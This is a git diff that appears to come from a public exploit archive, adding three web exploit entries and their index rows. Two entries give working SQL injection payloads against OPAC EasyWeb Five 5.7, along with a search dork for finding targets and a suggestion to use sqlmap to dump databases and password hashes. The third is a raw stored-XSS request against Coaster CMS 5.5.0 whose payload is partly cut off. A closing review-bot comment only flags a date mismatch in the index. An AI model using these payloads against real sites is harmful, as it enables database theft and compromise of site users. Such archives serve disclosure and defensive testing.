diff --git a/exploits/php/webapps/45518.txt b/exploits/php/webapps/45518.txt
new file mode 100644
index 000000000..aeb8a8104
--- /dev/null
+++ b/exploits/php/webapps/45518.txt
@@ -0,0 +1,21 @@
+# Exploit Title: OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection
+# Dork: inurl:"index.php?scelta=campi"
+# Date: 2018-10-02
+# Exploit Author: Dino Barlattani
+# Vendor Homepage: http://www.nexusfi.it/
+# Software Link: http://www.nexusfi.it/easyweb.php
+# Version: 5.7
+# Category: Webapps
+# Platform: PHP
+# CVE: N/A
+
+# POC:
+# http://(server ip)/easyweb/w2001/index.php?scelta=campi&&biblio=RT10AH[SQL]&lang=
+
+# You can use sqlmap for dump entire database and dumping hash
+
+scelta=campi&&biblio=RT10AH' AND ROW(3677,8383)>(SELECT
+COUNT(*),CONCAT(0x7176627a71,(SELECT
+(ELT(3677=3677,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 8278 UNION
+SELECT 2746 UNION SELECT 1668 UNION SELECT 1526)a GROUP BY x) AND
+'CrYc'='CrYc&lang=
\ No newline at end of file
diff --git a/exploits/php/webapps/45519.txt b/exploits/php/webapps/45519.txt
new file mode 100644
index 000000000..a13887b20
--- /dev/null
+++ b/exploits/php/webapps/45519.txt
@@ -0,0 +1,147 @@
+# Exploit Title: Coaster CMS 5.5.0 - Cross-Site Scripting
+# Date: 2018-10-01
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://www.web-feet.co.uk/
+# Software Link : https://github.com/Web-Feet/coastercms
+# Software : Coaster CMS
+# Product Version: v5.5.0
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+# CVE : N/A
+
+# A Stored XSS vulnerability has been discovered in the v5.5.0 version of the Coaster CMS product.
+
+# HTTP POST Request :
+
+POST /admin/pages/edit/26 HTTP/1.1
+Host: demo.coastercms.org
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://demo.coastercms.org/admin/pages/edit/26
+Content-Type: multipart/form-data; boundary=---------------------------24464570528145
+Content-Length: 3353
+Cookie: __cfduid=ddc0ae999f19fa783083ea0c7fdce0ba41538397617; XSRF-TOKEN=eyJpdiI6IndLeTBrZVwvWkdzUE9JSTArU3FOQ3BRPT0iLCJ2YWx1ZSI6InlsZ3Jib0ZNQTM3TXZEZGlwd0hJZmg1aHRibGZDWHZTcmordkRKbnRHWVVjYUJ4TlFOSGdYNkFIWHBSdlozUlY1c3ZJQjNuek9tOW92WXE5SkloOHZ3PT0iLCJtYWMiOiI0MzkzZjU1YWNiNDU2MDhkMDVhMDMwZDkwZTNhZjc4NGI5YzMzZjk0N2Q4YmJmYzY3NWZlZjg1MzVjYTJmMWY2In0%3D; laravel_session=eyJpdiI6IkNhM0Roc280SjE2aFcweXlcLzZwR2hRPT0iLCJ2YWx1ZSI6IldoUG9xTnNqRjh2TlBrQW51NlhqU1hCa3NIZmhSczFlYWE5Mkxza3dMWThkbFZcL2E1VmVTRExCa3h2ckMrdDliajZSTjRSUnhQcEJiek1pSjZ6VGRyZz09IiwibWFjIjoiMmQ0YjBkMmY1NDQ4ODdjOWVhZWUyMDFkY2UwMTlkNTM4ZmEyMGE4YjAwMDVkYmQ3ODZiZWUyOWM4OWQzODg4ZSJ9
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="_token"
+
+ZeLPiM6IJlkjRf0tosDFjMNPOXVsPv5YioF6092P
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[19]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; 
name="block[20]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[21]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[34]"
+
+Search
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[36]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[33]"
+
+

"> + +

+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[1][exists]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[1][select]"
+
+posts
+-----------------------------24464570528145
+Content-Disposition: form-data; name="publish"
+
+publish
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[35][source]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="block[35][alt]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[parent]"
+
+0
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info_lang[name]"
+
+Search
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info_lang[url]"
+
+search
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[link]"
+
+0
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info_other[group_radio]"
+
+0
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[group_container]"
+
+0
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[group_container_url_priority]"
+
+0
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[template][exists]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[template][select]"
+
+3
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[live][exists]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[live][select]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[live_start]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; 
name="page_info[live_end]"
+
+
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[sitemap][exists]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="page_info[sitemap][select]"
+
+1
+-----------------------------24464570528145
+Content-Disposition: form-data; name="versionFrom"
+
+4
+-----------------------------24464570528145
+Content-Disposition: form-data; name="duplicate"
+
+0
+-----------------------------24464570528145--
\ No newline at end of file
diff --git a/exploits/php/webapps/45521.txt b/exploits/php/webapps/45521.txt
new file mode 100644
index 000000000..a5a4bae5f
--- /dev/null
+++ b/exploits/php/webapps/45521.txt
@@ -0,0 +1,22 @@
+# Exploit Title: OPAC EasyWeb Five 5.7 - 'nome' SQL Injection
+# Dork: N/A
+# Exploit Author: Ihsan Sencan
+# Date: 2018-10-02
+# Vendor Homepage: http://www.nexusfi.it/
+# Software Link: http://www.nexusfi.it/easyweb.php
+# Version: 5.7
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC:
+# 1)
+# POST /easyweb/w7008/index.php?scelta=cerca_biblio&&opac=w7008 HTTP/1.1
+
+nome=') UNION ALL SELECT NULL,NULL,NULL,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+
+nome=') AND ROW(3,6)>(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1))),FLOOR(RAND(0)*2))x FROM (SELECT 66 UNION SELECT 7030 UNION SELECT 4751 UNION SELECT 1310)a GROUP BY x)-- Efe
+
+
+http://Target/easyweb/w7008/index.php?scelta=cerca_biblio&&opac=w7008
+nome=') UNION ALL SELECT NULL,NULL,NULL,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 2bb3a97ac..90503960b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -40057,3 +40057,6 @@ id,file,description,date,author,type,platform,port
 45513,exploits/php/webapps/45513.txt,"Flippa Marketplace Clone 1.0 - 'date_started' SQL Injection",2018-10-01,"Ihsan Sencan",webapps,php,
 45514,exploits/php/webapps/45514.txt,"WUZHICMS 2.0 - Cross-Site Scripting",2018-10-01,Renzi,webapps,php,
 45515,exploits/hardware/webapps/45515.txt,"Billion ADSL Router 400G 20151105641 - Cross-Site Scripting",2018-10-01,cakes,webapps,hardware,
+45518,exploits/php/webapps/45518.txt,"OPAC EasyWeb Five 5.7 - 'biblio' SQL Injection",2018-10-02,"Dino Barlattani",webapps,php,
+45519,exploits/php/webapps/45519.txt,"Coaster CMS 5.5.0 - Cross-Site Scripting",2018-10-02,"Ismail Tasdelen",webapps,php,
+45521,exploits/php/webapps/45521.txt,"OPAC EasyWeb Five 5.7 - 'nome' SQL Injection",2018-10-02,"Ihsan Sencan",webapps,php,
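Review bot: The new index row for 45519 records its date as 2018-10-02, while the advisory it points to (exploits/php/webapps/45519.txt, added earlier in this commit) carries `# Date: 2018-10-01`; the two should agree, so either the CSV cell or the file header needs correcting. The other two added rows (45518 and 45521) match the `# Date:` lines in their files. If the CSV column is meant to hold the publication date rather than the author's date, stating that convention once in the commit message or the CSV header would stop future rows drifting in the same way.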